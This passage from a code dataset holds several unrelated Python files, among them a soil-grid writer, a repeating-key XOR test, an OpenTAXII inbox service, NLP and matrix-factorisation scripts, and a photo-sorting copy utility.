(ZALF)\n\nimport sqlite3\n\ndef create():\n \"create soil grid\"\n\n with open(\"soil-profile-id_nrw_gk3.asc\", mode=\"w\") as fff:\n fff.write(\n\"\"\"ncols 250\nnrows 241\nxllcorner 3280914.799999999800\nyllcorner 5580000.500000000000\ncellsize 1000.000000000000\nNODATA_value -9999\n\"\"\")\n\n query = \"select row, column, grid_id from MACSUR_WP3_soil_r1 order by row, column\"\n con = sqlite3.connect(\"soil.sqlite\")\n con.row_factory = sqlite3.Row\n values = {}\n for row in con.cursor().execute(query):\n values[(int(row[\"row\"]), int(row[\"column\"]))] = int(row[\"grid_id\"])\n con.close()\n\n for row in range(0, 241):\n for col in range(0, 250):\n rowcol = ((row + 282), col)\n fff.write(str(values[rowcol] if rowcol in values else -9999) + \" \" if col < 250 else \"\")\n fff.write(\"\\n\")\n\n\n#con = sqlite3.connect(\"soil.sqlite\")\n#x = soil_parameters(con, 197595)\n#print x\n\ncreate()\n","sub_path":"create-soil-grid.py","file_name":"create-soil-grid.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"578645905","text":"\n# Strictly procedural:\ns = 0\nfor n in range(1, 10):\n if n % 3 == 0 or n % 5 == 0:\n s += n\nprint(s)\n\n\n# OOP\nm = list()\nfor n in range(1, 10):\n if n % 3 == 0 or n % 5 == 0:\n m.append(n)\nprint(sum(m))\n\n\nclass SummableList(list):\n def sum(self):\n s = 0\n for v in self.__iter__():\n s += v\n return s\n\n \n# Functional\ndef sum(seq):\n if len(seq) == 0: return 0\n return seq[0] + sum(seq[1:])\n\ndef until(n, filter_func, v):\n if v == n: return []\n if filter_func(v): return [v] + until(n, filter_func, v + 1)\n else: return until(n, filter_func, v + 1)\n\nmult_3_5 = lambda x: x % 3 == 0 or x % 5 == 0\n\n# Tests\nprint(mult_3_5(3)) # True\nprint(mult_3_5(4)) # False\nprint(mult_3_5(5)) # True\n\nprint(until(10, mult_3_5, 0)) # [0, 3, 5, 6, 9]\n\n\n","sub_path":"functional/01_intro/01_procedural_paradigm.py","file_name":"01_procedural_paradigm.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"480807533","text":"#!/usr/bin/env python\n\nimport 
unittest\n\nfrom problem_05 import CircularBuffer\nfrom problem_05 import repeating_key_xor\n\n\nclass TestProblemFive(unittest.TestCase):\n def test_circular_buffer_with_no_characters(self):\n circle = CircularBuffer('')\n self.assertEqual([each for each in circle], [])\n\n def test_circular_buffer_with_one_character(self):\n circle = CircularBuffer('z')\n result = [circle.next() for _ in range(3)]\n expected = ['z', 'z', 'z']\n self.assertEqual(result, expected)\n\n def test_circular_buffer_with_many_characters(self):\n circle = CircularBuffer('test')\n result = [circle.next() for _ in range(8)]\n expected = ['t', 'e', 's', 't', 't', 'e', 's', 't']\n self.assertEqual(result, expected)\n\n def test_repeating_key_xor(self):\n key = 'ICE'\n decrypted = ('Burning \\'em, if you ain\\'t quick and nimble\\n'\n 'I go crazy when I hear a cymbal')\n encrypted = ('0b3637272a2b2e63622c2e69692a23693a2a3c6324202d623d63343c2'\n 'a26226324272765272a282b2f20430a652e2c652a3124333a653e2b20'\n '27630c692b20283165286326302e27282f')\n\n self.assertEqual(repeating_key_xor(key, decrypted), encrypted)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"set_01/test_problem_05.py","file_name":"test_problem_05.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"95204218","text":"\nfrom libtaxii.constants import (\n SVC_INBOX, MSG_INBOX_MESSAGE, SD_ACCEPTABLE_DESTINATION,\n ST_DESTINATION_COLLECTION_ERROR, ST_NOT_FOUND, SD_ITEM\n)\n\nfrom ..utils import is_content_supported\nfrom ..entities import ContentBindingEntity\nfrom ..exceptions import StatusMessageException\n\nfrom ..converters import content_binding_entities_to_content_bindings, service_to_service_instances\n\nfrom .abstract import TaxiiService\nfrom .handlers import InboxMessageHandler\n\n\nclass InboxService(TaxiiService):\n\n service_type = SVC_INBOX\n\n handlers = {\n MSG_INBOX_MESSAGE : InboxMessageHandler\n }\n\n destination_collection_required = False\n accept_all_content = False\n supported_content = []\n\n\n def __init__(self, accept_all_content=False, destination_collection_required=False,\n supported_content=[], **kwargs):\n\n super(InboxService, self).__init__(**kwargs)\n\n self.accept_all_content = accept_all_content\n self.supported_content = map(ContentBindingEntity, supported_content)\n\n self.destination_collection_required = destination_collection_required\n\n\n def is_content_supported(self, content_binding, version=None):\n\n if self.accept_all_content:\n return True\n\n return is_content_supported(self.supported_content, content_binding, version=version)\n\n\n def get_destination_collections(self):\n return self.server.persistence.get_collections(self.id)\n\n\n def validate_destination_collection_names(self, name_list, in_response_to):\n\n name_list = name_list or []\n\n if (self.destination_collection_required and not name_list) or \\\n (not self.destination_collection_required and name_list):\n\n if not name_list:\n message = 'A Destination_Collection_Name is required and none were specified'\n else:\n message = 'Destination_Collection_Names are prohibited for this Inbox Service'\n\n details = {SD_ACCEPTABLE_DESTINATION: [c.name for c in self.get_destination_collections() if c.enabled]}\n\n raise StatusMessageException(ST_DESTINATION_COLLECTION_ERROR, message=message,\n in_response_to=in_response_to, extended_headers=details)\n\n if not name_list:\n return []\n\n collections = []\n\n destinations_map = dict((c.name, c) for c 
in self.get_destination_collections())\n\n for name in name_list:\n if name in destinations_map:\n collections.append(destinations_map[name])\n else:\n raise StatusMessageException(ST_NOT_FOUND, message='The Data Collection was not found',\n in_response_to=in_response_to, extended_headers={SD_ITEM: name})\n\n return collections\n\n\n def to_service_instances(self, version):\n\n service_instances = service_to_service_instances(self, version)\n\n if self.accept_all_content:\n return service_instances\n\n for si in service_instances:\n si.inbox_service_accepted_content = self.get_supported_content(version)\n\n return service_instances\n\n\n\n def get_supported_content(self, version):\n\n if self.accept_all_content:\n return []\n\n return content_binding_entities_to_content_bindings(self.supported_content, version)\n\n","sub_path":"opentaxii/taxii/services/inbox.py","file_name":"inbox.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"623424021","text":"# Encode the words in the text with a multiset (bag of words)\ncorpus = [\n'UNC played Duke in basketball',\n'Duke lost the basketball game'\n] # contains two documents\n\n# there are 8 distinct words in total; the first word of the first document is UNC, so the first element of its vector is 1\n# the first document does not contain \"game\", so that element of its feature vector is 0\nfrom sklearn.feature_extraction.text import CountVectorizer\nvectorizer=CountVectorizer()\nX = vectorizer.fit_transform(corpus) # build the vocabulary; the documents must be passed in first\n\nprint(vectorizer.get_feature_names()) # inspect the feature words in the documents\n# ['basketball', 'duke', 'game', 'in', 'lost', 'played', 'the', 'unc']\n\nprint(vectorizer.vocabulary_) # inspect the index assigned to each word\n# {'unc': 7, 'played': 5, 'duke': 1, 'in': 3, 'basketball': 0, 'lost': 4, 'the': 6, 'game': 2}\n\nprint(X.toarray()) # convert the sparse matrix to an array\n\ncorpus.append('I ate a sandwich')\nprint(vectorizer.fit_transform(corpus).todense())\nprint(vectorizer.vocabulary_)\n","sub_path":"Feature extraction/词袋模型.py","file_name":"词袋模型.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"341379814","text":"#!/usr/bin/env python\n\n\nimport os\nimport sys\nimport numpy as np\n\n\ndef die(message):\n sys.stderr.write(\"Error: {}\\n\".format(message))\n sys.exit(1)\n\n\ndef readFiles(inFiles):\n npw = []\n evc = []\n for inFile in inFiles:\n with open(inFile) as f:\n lines = f.readlines()\n npw_part = len(lines)\n evc_part = np.zeros(npw_part, dtype=np.complex128)\n for i, line in enumerate(lines):\n evc_part[i] = np.float64(line.split()[0]) + 1j * np.float64(line.split()[2])\n npw.append(npw_part)\n evc.append(evc_part)\n return npw, evc\n\n\ndef calcOverlap(evc):\n # calculate and sum product of wavefunctions\n p1 = np.conjugate(evc[0]) * evc[0]\n p2 = np.conjugate(evc[1]) * evc[1]\n p3 = np.conjugate(evc[0]) * evc[1]\n # return np.absolute(np.sum(product))/ngtot\n return np.absolute(np.sum(p1)), np.absolute(np.sum(p2)), np.absolute(np.sum(p3)) \n\n\ndef calcSum(evc):\n # calculate sum\n return np.absolute(np.sum(evc[0])), np.absolute(np.sum(evc[1])), np.absolute(np.sum(evc[2]))\n\n\nlf = False\nwhile len(sys.argv) > 1:\n if sys.argv[1] == \"-f\":\n lf = True\n del sys.argv[1]\n elif sys.argv[1] == \"-w\":\n lf = False\n del sys.argv[1]\n elif sys.argv[1].startswith(\"-\"):\n die (\"Unrecognized options: {}\".format(sys.argv[1]))\n else:\n break\n\nif lf and len(sys.argv) == 4:\n inFiles = sys.argv[1:4]\nelif not lf and len(sys.argv) == 3:\n inFiles = sys.argv[1:3]\nelse:\n die(\"Incorrect number of files specified: {}\".format(len(sys.argv) - 1))\n\nnpw, evc = readFiles(inFiles)\n\nfor i in 
range(len(npw) - 1):\n if npw[i] != npw[i+1]:\n die(\"npw from file{} and file{} differ: npw = {} and {}, respectively\".format(i,i+1,npw[i],npw[i+1]))\n\nif not lf:\n p1, p2, p3 = calcOverlap(evc)\nelse:\n p1, p2, p3 = calcSum(evc)\n\n\nprint(\"||^2 = {}\".format(p1))\nprint(\"||^2 = {}\".format(p2))\nprint(\"||^2 = {}\".format(p3))\n\n","sub_path":"qe-utility/check_norm.py","file_name":"check_norm.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"232051784","text":"\"\"\"\n 使用Prcess创建两个子进程,同时复制一个文件,分别复制文件的前半部分和后半部分\n\"\"\"\nADDR = '/home/tarena/wpy/DataStructure/day01/singlelink.py'\nimport os\nimport multiprocessing as mp\nm = os.path.getsize(ADDR)\nc = open(ADDR,'rb')\ns = open('file01','wb')\nb = open('file02','wb')\ndef fun01():\n s.write(c.read(int(m/2)))\n s.flush()\n s.close()\n return c.tell()\n\np = mp.Process(target=fun01)\np.start()\nb.seek(fun01())\nb.write(c.read(int(m / 2)))\nb.flush()\nb.close()\np.join()","sub_path":"month02/day06/homework.py","file_name":"homework.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"415038360","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 28 17:22:12 2019\n\n@author: katherinerinaldi\n\"\"\"\n\nimport csv\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\npath = '/Users/jacquelinedowling/MEM_Nov2019/SEM-1.2/Input_Data/Lei_Solar_Wind/'\n\n\n\ndemand = '{}US_demand_unnormalized_FOURTY_YEARS_FROM_FOUR_YEAR_LOOP.csv'.format(path)\nwind = '{}US_wind_thresh.csv'.format(path)\nsolar = '{}US_solar_thresh.csv'.format(path)\n\n\n#this takes in the file and gets rid of all lines before BEGIN_DATA\n#then it returns a pandas dataframe\n\ndef getData(filename):\n with open(filename) as file:\n reader = csv.reader(file)\n \n #read to keyword 'BEGIN_DATA'\n while True:\n line = next(reader)\n if line[0] == 'BEGIN_DATA':\n break\n \n #take all non-blank lines\n data = []\n while True:\n try:\n line = next(reader)\n if any(field.strip() for field in line):\n data.append(line)\n except:\n break\n \n# #turn data dataframe\n df = pd.DataFrame(data)\n headers = df.iloc[0]\n data_array = pd.DataFrame(df.values[1:], columns=headers)\n\n return data_array\n\n\n# this makes the new 'date' column in each type of dataframe (depending on how\n# the original file is formatted there are diff options)\ndef dateMaker(df, dataType):\n if dataType == 'wind':\n df['wind capacity']=df['wind capacity'].astype(float)\n elif dataType == 'solar':\n df['solar capacity']=df['solar capacity'].astype(float)\n elif dataType == 'demand':\n df['demand (MW)']=df['demand (MW)'].astype(float)\n df['hour']=df['hour'].astype(int)\n df['hour']=df['hour']-1\n dates=pd.to_datetime(df[['year', 'month', 'day', 'hour']])\n df['date'] = dates\n df.set_index(['date'], inplace=True)\n \ndef stat_quantile(groupby_dataframe, quantile):\n\toutput = groupby_dataframe.quantile(q = quantile)\n\treturn output\n\n#sorts out the data by season (winter or summer), groups by hour of day\ndef getSeasons(df, season, dataType):\n if dataType == 'demand':\n df_gb_month = df.groupby(df.index.month)['demand (MW)']\n elif dataType =='solar': \n df_gb_month = df.groupby(df.index.month)['solar capacity']\n elif dataType == 'wind':\n df_gb_month= df.groupby(df.index.month)['wind capacity']\n \n if season == 'summer':\n season_df = 
df_gb_month.get_group(6).append(df_gb_month.get_group(7))\n season_df = season_df.append(df_gb_month.get_group(8))\n if season == 'winter':\n season_df = df_gb_month.get_group(12).append(df_gb_month.get_group(1))\n season_df = season_df.append(df_gb_month.get_group(2))\n \n season_df_gb = season_df.groupby(season_df.index.hour) \n \n return season_df_gb\n\ndef time_shift(array, hourstoshift):\n\n\tfor i in range(hourstoshift):\n\n\t\trow = array.iloc[0] # take stock of first row\n\t\tarray = array.shift(-1) # remove first entry and shift all data up one row\n\t\tarray.iloc[-1] = row # put old first row as last row\n\n\t\n\tarray = array.values\n\treturn array\n\n#get the data\ndemand_df = getData(demand)\nsolar_df = getData(solar)\nwind_df = getData(wind)\n\n#turn the year month day columns into one new column called date\ndateMaker(demand_df, 'demand')\ndateMaker(solar_df, 'solar')\ndateMaker(wind_df, 'wind')\n\n#normalize the data (ie divide by the 39 year mean)\ndemand_mean = demand_df['demand (MW)'].mean()\nsolar_mean = solar_df['solar capacity'].mean()\nwind_mean = wind_df['wind capacity'].mean()\n\ndemand_df['demand (MW)']=demand_df['demand (MW)']/demand_mean\nsolar_df['solar capacity']=solar_df['solar capacity']/solar_mean\nwind_df['wind capacity']=wind_df['wind capacity']/wind_mean\n\n#make y values for plotting main fig (resample to take the daily mean)\ndailyMean_demand = demand_df.resample('D').mean()\ndailyMean_solar = solar_df.resample('D').mean()\ndailyMean_wind = wind_df.resample('D').mean()\n\n#groups each value by day of year (can compare the same day in many diff years)\ndemand_gb=dailyMean_demand.groupby(dailyMean_demand.index.dayofyear)\nsolar_gb=dailyMean_solar.groupby(dailyMean_solar.index.dayofyear)\nwind_gb=dailyMean_wind.groupby(dailyMean_wind.index.dayofyear)\n\n#median for each day\ny_demand = demand_gb.median()\ny_solar = solar_gb.median()\ny_wind = wind_gb.median()\n\n#makes the 50% / 100% areas\ndemand_fourth_quartile = stat_quantile(demand_gb, 1)\ndemand_third_quartile = stat_quantile(demand_gb, 0.75)\ndemand_first_quartile = stat_quantile(demand_gb, 0.25)\ndemand_zeroth_quartile = stat_quantile(demand_gb, 0)\n\nsolar_fourth_quartile = stat_quantile(solar_gb, 1)\nsolar_third_quartile = stat_quantile(solar_gb, 0.75)\nsolar_first_quartile = stat_quantile(solar_gb, 0.25)\nsolar_zeroth_quartile = stat_quantile(solar_gb, 0)\n\nwind_fourth_quartile = stat_quantile(wind_gb, 1)\nwind_third_quartile = stat_quantile(wind_gb, 0.75)\nwind_first_quartile = stat_quantile(wind_gb, 0.25)\nwind_zeroth_quartile = stat_quantile(wind_gb, 0)\n\n#make data for subplot 1 (hourly summer for Jun-6, July-7, August-8)\nsummer_demand = getSeasons(demand_df, 'summer', 'demand')\nsummer_solar = getSeasons(solar_df, 'summer', 'solar')\nsummer_wind = getSeasons(wind_df, 'summer', 'wind')\n\n#make data for subplot 2 (hourly winter for dec-12, jan-1, and feb-2)\nwinter_demand = getSeasons(demand_df, 'winter', 'demand')\nwinter_solar = getSeasons(solar_df, 'winter', 'solar')\nwinter_wind = getSeasons(wind_df, 'winter', 'wind')\n\n#make y values for subplots\ny_summer_demand = time_shift(summer_demand.median(),7)\ny_summer_solar = time_shift(summer_solar.median(),7)\ny_summer_wind = time_shift(summer_wind.median(),7)\n\ny_winter_demand = time_shift(winter_demand.median(),7)\ny_winter_solar = time_shift(winter_solar.median(),7)\ny_winter_wind = time_shift(winter_wind.median(),7)\n\n#makes the 50% / 100% areas for summer and winter subplots\nsummer_demand_fourth_quartile = 
time_shift(stat_quantile(summer_demand, 1),7)\nsummer_demand_third_quartile = time_shift(stat_quantile(summer_demand, 0.75),7)\nsummer_demand_first_quartile = time_shift(stat_quantile(summer_demand, 0.25),7)\nsummer_demand_zeroth_quartile = time_shift(stat_quantile(summer_demand, 0),7)\n\nsummer_solar_fourth_quartile = time_shift(stat_quantile(summer_solar, 1),7)\nsummer_solar_third_quartile = time_shift(stat_quantile(summer_solar, 0.75),7)\nsummer_solar_first_quartile = time_shift(stat_quantile(summer_solar, 0.25),7)\nsummer_solar_zeroth_quartile = time_shift(stat_quantile(summer_solar, 0),7)\n\nsummer_wind_fourth_quartile = time_shift(stat_quantile(summer_wind, 1),7)\nsummer_wind_third_quartile = time_shift(stat_quantile(summer_wind, 0.75),7)\nsummer_wind_first_quartile = time_shift(stat_quantile(summer_wind, 0.25),7)\nsummer_wind_zeroth_quartile = time_shift(stat_quantile(summer_wind, 0),7)\n\nwinter_demand_fourth_quartile = time_shift(stat_quantile(winter_demand, 1),7)\nwinter_demand_third_quartile = time_shift(stat_quantile(winter_demand, 0.75),7)\nwinter_demand_first_quartile = time_shift(stat_quantile(winter_demand, 0.25),7)\nwinter_demand_zeroth_quartile = time_shift(stat_quantile(winter_demand, 0),7)\n\nwinter_solar_fourth_quartile = time_shift(stat_quantile(winter_solar, 1),7)\nwinter_solar_third_quartile = time_shift(stat_quantile(winter_solar, 0.75),7)\nwinter_solar_first_quartile = time_shift(stat_quantile(winter_solar, 0.25),7)\nwinter_solar_zeroth_quartile = time_shift(stat_quantile(winter_solar, 0),7)\n\nwinter_wind_fourth_quartile = time_shift(stat_quantile(winter_wind, 1),7)\nwinter_wind_third_quartile = time_shift(stat_quantile(winter_wind, 0.75),7)\nwinter_wind_first_quartile = time_shift(stat_quantile(winter_wind, 0.25),7)\nwinter_wind_zeroth_quartile = time_shift(stat_quantile(winter_wind, 0),7)\n\n\n\nx_values = range(len(y_demand))\nx_season_values = range(len(y_summer_demand))\n\n#plot\n \nmonths = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']\n\n#params = {'legend.fontsize': 'medium',\n# 'figure.figsize': (7, 3.5), #7 3.5\n# 'axes.labelsize': 'x-large',\n# 'axes.titlesize':'x-large',\n# 'xtick.labelsize':'large',\n# 'ytick.labelsize':'large'}\n#\n#plt.rcParams.update(params)\n\ngridsize = (3, 2)\nfig = plt.figure(figsize=(7, 6.75))\nax1 = plt.subplot2grid(gridsize, (0, 0), colspan=2, rowspan=2)\nax2 = plt.subplot2grid(gridsize, (2, 0))\nax3 = plt.subplot2grid(gridsize, (2, 1))\n\n\nax1.plot(x_values, y_demand, color='black', linewidth='2', label='demand')\nax1.fill_between(x_values, demand_zeroth_quartile['demand (MW)'], demand_fourth_quartile['demand (MW)'], alpha = 0.2, facecolor = 'black')\nax1.fill_between(x_values, demand_first_quartile['demand (MW)'], demand_third_quartile['demand (MW)'], alpha = 0.5, facecolor = 'black')\n\nax1.plot(x_values, y_solar, color='orange', linewidth='2', label='solar')\nax1.fill_between(x_values, solar_zeroth_quartile['solar capacity'], solar_fourth_quartile['solar capacity'], alpha = 0.2, facecolor = 'orange', edgecolor = 'orange')\nax1.fill_between(x_values, solar_first_quartile['solar capacity'], solar_third_quartile['solar capacity'], alpha = 0.5, facecolor = 'orange', edgecolor = 'orange')\n\nax1.plot(x_values, y_wind, color='blue', linewidth='2', label='wind')\nax1.fill_between(x_values, wind_zeroth_quartile['wind capacity'], wind_fourth_quartile['wind capacity'], alpha = 0.2, facecolor = 'blue')\nax1.fill_between(x_values, wind_first_quartile['wind capacity'], 
wind_third_quartile['wind capacity'], alpha = 0.5, facecolor = 'blue')\n\n\nax1.set_ylabel('Power divided by 39-year mean', fontsize = 14, color = 'black')\nax1.set_xlim(0, 365)\nax1.set_ylim(0,3)\nax1.set_xticks(np.arange(10, 360, 31))\nax1.set_xticklabels(months, fontsize = 12)\nax1.set_xlabel('Month of year', fontsize=14)\n\n\n\nax2.plot(x_season_values, y_summer_demand, color='black', linewidth='2', label='demand')\nax2.fill_between(x_season_values, summer_demand_zeroth_quartile, summer_demand_fourth_quartile, alpha = 0.2, facecolor = 'black')\nax2.fill_between(x_season_values, summer_demand_first_quartile, summer_demand_third_quartile, alpha = 0.5, facecolor = 'black')\n\nax2.plot(x_season_values, y_summer_solar, color='orange', linewidth='2', label='solar')\nax2.fill_between(x_season_values, summer_solar_zeroth_quartile, summer_solar_fourth_quartile, alpha = 0.2, facecolor = 'orange', edgecolor='orange')\nax2.fill_between(x_season_values, summer_solar_first_quartile, summer_solar_third_quartile, alpha = 0.5, facecolor = 'orange', edgecolor='orange')\n\nax2.plot(x_season_values, y_summer_wind, color='blue', linewidth='2', label='wind')\nax2.fill_between(x_season_values, summer_wind_zeroth_quartile, summer_wind_fourth_quartile, alpha = 0.2, facecolor = 'blue')\nax2.fill_between(x_season_values, summer_wind_first_quartile, summer_wind_third_quartile, alpha = 0.5, facecolor = 'blue')\n\nax2.set_xlim(0, 23)\nax2.set_ylim(-0.2, 3.5)\nax2.set_xticks(np.arange(0,23,4))\nax2.set_ylabel('Power divided by \\n 39-year mean', fontsize = 14)\nax2.set_xlabel('Hour of day (PST)', fontsize=14)\nax2.set_title('Summer', fontsize=14)\n\nax3.plot(x_season_values, y_winter_demand, color='black', linewidth='2', label='demand')\nax3.fill_between(x_season_values, winter_demand_zeroth_quartile, winter_demand_fourth_quartile, alpha = 0.2, facecolor = 'black')\nax3.fill_between(x_season_values, winter_demand_first_quartile, winter_demand_third_quartile, alpha = 0.5, facecolor = 'black')\n\nax3.plot(x_season_values, y_winter_solar, color='orange', linewidth='2', label='solar')\nax3.fill_between(x_season_values, winter_solar_zeroth_quartile, winter_solar_fourth_quartile, alpha = 0.2, facecolor = 'orange',edgecolor='orange')\nax3.fill_between(x_season_values, winter_solar_first_quartile, winter_solar_third_quartile, alpha = 0.5, facecolor = 'orange',edgecolor='orange')\n\nax3.plot(x_season_values, y_winter_wind, color='blue', linewidth='2', label='wind')\nax3.fill_between(x_season_values, winter_wind_zeroth_quartile, winter_wind_fourth_quartile, alpha = 0.2, facecolor = 'blue')\nax3.fill_between(x_season_values, winter_wind_first_quartile, winter_wind_third_quartile, alpha = 0.5, facecolor = 'blue')\n\nax3.set_xlim(0, 23)\nax3.set_ylim(-0.2, 3.5)\nax3.set_xticks(np.arange(0,23,4))\nax3.set_xlabel('Hour of day (PST)', fontsize=14)\nax3.set_title('Winter', fontsize=14)\n\nfig.text(0.13, 0.93, 'a)', size='large')\nfig.text(0.13, 0.265, 'b)', size='large')\nfig.text(0.585, 0.265, 'c)', size='large')\n\nplt.tight_layout()\n\n#plt.savefig('{}\\resource_variability.pdf'.format(path), bbox_inches='tight')\nplt.savefig('si/SI_windsolarvar.pdf', bbox_inches='tight')\nplt.show()","sub_path":"SEM-1.2/Making_Figures/SIFigures_May2020/si1_windsolarvar.py","file_name":"si1_windsolarvar.py","file_ext":"py","file_size_in_byte":12606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"494910708","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport torch\n\nfrom 
models.LSTM import LSTM\n\n\nclass TextRNN(nn.Module):\n\n def __init__(self, vocab_size, embedding_dim, output_dim, hidden_size, num_layers, bidirectional, dropout, pad_idx):\n super(TextRNN, self).__init__()\n\n self.embedding = nn.Embedding(\n vocab_size, embedding_dim, padding_idx=pad_idx)\n self.rnn = LSTM(embedding_dim, hidden_size, num_layers,bidirectional, dropout)\n\n self.fc = nn.Linear(hidden_size * 2, output_dim)\n self.dropout = nn.Dropout(dropout)\n\n\n def forward(self, x):\n text, text_lengths = x\n # text: [sent len, batch size]\n embedded = self.dropout(self.embedding(text))\n # embedded: [sent len, batch size, emb dim]\n\n hidden = self.rnn(embedded, text_lengths)\n\n hidden = self.dropout(\n torch.cat((hidden[-2, :, :], hidden[-1, :, :]), dim=1)) # 连接最后一层的双向输出\n \n return self.fc(hidden)\n","sub_path":"Medium-TextClassification/TextRNN/TextRNN.py","file_name":"TextRNN.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"653761375","text":"## test file\nimport numpy as np\nimport time\nfrom NB_NMF2 import em_full as em_full2\nfrom NB_NMF import em_full as em_full\nfrom misc import sim_nb_nmf\nnp.random.seed(123)\n\nimport pdb\n## setup\nn = 100\np = 500\nK = 3\na = 100*np.random.random(size = (p))\npt = [10*i for i in range(10)]\nprint(\"quantile for true a: \")\nprint(np.percentile(a, pt))\n\ninit_iter = 10\nmaxiter = 300\neval_every = 20\nprint(\"experiment with data: n = {}, p = {}\\n; fitted with K = {}\\n\".format(n,p,K))\nX, Lam,L_,F_ = sim_nb_nmf(n,p,K,a, seed = 123)\ntol = 1e-04\n\n## initialization\nL0,F0,a0 = em_full(X, K, 10, init = 'nndsvda', LF = None, maxiter = init_iter, verbose = True, eval_every = eval_every, random_state = 123, tol = tol)\nprint(\"a initialized to be: {}\".format(a0))\n\n## computation\nprint(\"start fitting with NBNMF_emfull\")\nstart = time.time()\nL1,F1,a1 = em_full(X, K, a0, init = None, LF = [L0,F0], maxiter = maxiter, verbose = True, eval_every = eval_every, random_state = 123, tol = tol)\nprint(\"a: {}\".format(a1))\nprint(\"EM fitted with {:.2f} seconds\\n\".format(time.time() - start))\n\n\n# print(\"start fitting with NBNMF2_emfull\")\n# a_ = np.array([a0] * p)\n# start = time.time()\n# L,F,a = em_full2(X, K, a_, init = None, LF = [L0,F0], maxiter = maxiter, verbose = True, eval_every = eval_every, random_state = 123, tol = tol)\n# print(\"EM fitted with {:.2f} seconds\\n\".format(time.time() - start))\n# print(\"quantile for fitted a: \")\n# print(np.percentile(a, pt))\n\nprint(\"start fitting with NBNMF2_emfull\")\na_ = np.array([a0] * p)\nstart = time.time()\nL3,F3,a3 = em_full2(X, K, a, init = None, LF = [L_,F_], maxiter = maxiter, verbose = True, eval_every = eval_every, random_state = 123, tol = tol)\nprint(\"EM fitted with {:.2f} seconds\\n\".format(time.time() - start))\nprint(\"quantile for fitted a: \")\nprint(np.percentile(a3, pt))\n\n\n\n# ## computation\n# print(\"start fitting with VB\")\n# a_ = a\n# prior = [1,0,1,0]\n# print(\"use a = {}\".format(a_))\n# print(\"prior:\\n\")\n# print(prior)\n# start = time.time()\n# L,F = VB(X,K,a_,prior,maxiter = 200, verbose = True, eval_every = 20)\n# #L,F = VB_test(X,K,a_,prior,maxiter = 200, verbose = True, eval_every = 20)\n# print(\"VB fitted with {:.2f} seconds\\n\".format(time.time() - start))\n\n## result for VB\n# n = 500\n# p = 1000\n# K = 3\n# Zeta : 0.055\n# ABl : 0.011\n# ABf : 0.008\n# ABu : 0.004\n# VB fitted with 15.72 seconds\n\n\n# print(L)\n# 
print(F)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"code/test_nbnmf2.py","file_name":"test_nbnmf2.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"497819620","text":"import time\nimport os\nimport hash\nimport queue\nimport threading\nimport time\nimport datetime\nimport hashlib\nimport io\nimport psutil\nimport math\nimport configparser\nimport pymysql\nimport db\nimport accessories\nimport shutil\nimport sys\n\nlock = threading.Lock()\nobj_Disk = psutil.disk_usage('/')\nDiskPercentUsed = (obj_Disk.percent)\nFreeSpace = (obj_Disk.free)\nFileCount = 0\ntotal_size = 0\nPercentageProgress = 0\nCameraModel = \"\"\nsource = \"/mnt/source/From i2S/\"\ntarget = \"/mnt/target/\"\nFileHash = \"\"\nFilesCount = 0\nFilesCount = 0\nbegin = time.time()\n\nprint(FreeSpace/1024)\n\ndef processfile(pathfile):\n global total_size\n global FileCount\n global target\n global FilesCount\n global log\n log = open(\"output.log\",\"a\")\n if accessories.IsIgnoredFile(pathfile):\n return\n file = accessories.File(pathfile)\n FileCount += 1\n #print(file.HashTime)\n if not file.AllreadyInDB():\n CreationDate = file.creationDate\n if file.Make == \"Other\" and file.Model == \"Other\":\n Camera = \"Other\"\n elif file.Make == \"Other\" and file.Model != \"Other\":\n Camera = file.Model\n elif file.Make != \"Other\" and file.Model == \"Other\":\n Camera = file.Make\n elif str(file.Make) in str(file.Model):\n Camera = file.Model\n else:\n Camera = str(file.Make) + \" \" + str(file.Model)\n FileDestination = os.path.join(target, CreationDate[0], CreationDate[1], CreationDate[2], Camera)\n if accessories.CreateDestionation(FileDestination):\n success, error, time = file.CopyTo(FileDestination) \n if not success:\n print(\"%s : %s\" % (error, file.Filename))\n log.write(\"%s : %s\" % (error, file.Filename))\n file.WriteErrorToDB(\"%s : %s\" % (error, file.Filename))\n else:\n print(\"%s/%s, %s, %s, %s, %s, %s, %s\" % (FileCount, FilesCount, file.Filename, file.Make, file.Model, round(file.Size/1024/1024,2), round(file.HashTime,2),round((file.Size/1024/1024)/time,2)))\n log.write(\"%s/%s, %s, %s, %s, %s, %s, %s\\n\" % (FileCount, FilesCount, file.Filename, file.Make, file.Model, round(file.Size/1024/1024,2), round(file.HashTime,2),round((file.Size/1024/1024)/time,2)))\n file.WriteFiletoDB()\n else:\n print(\"Could not create destination %s\" % (FileDestination))\n log.write(\"Could not create destination %s\\n\" % (FileDestination))\n file.WriteErrorToDB(\"Could not create destination %s\\n\" % (FileDestination))\n else:\n print(\"Allready in database %s\" % 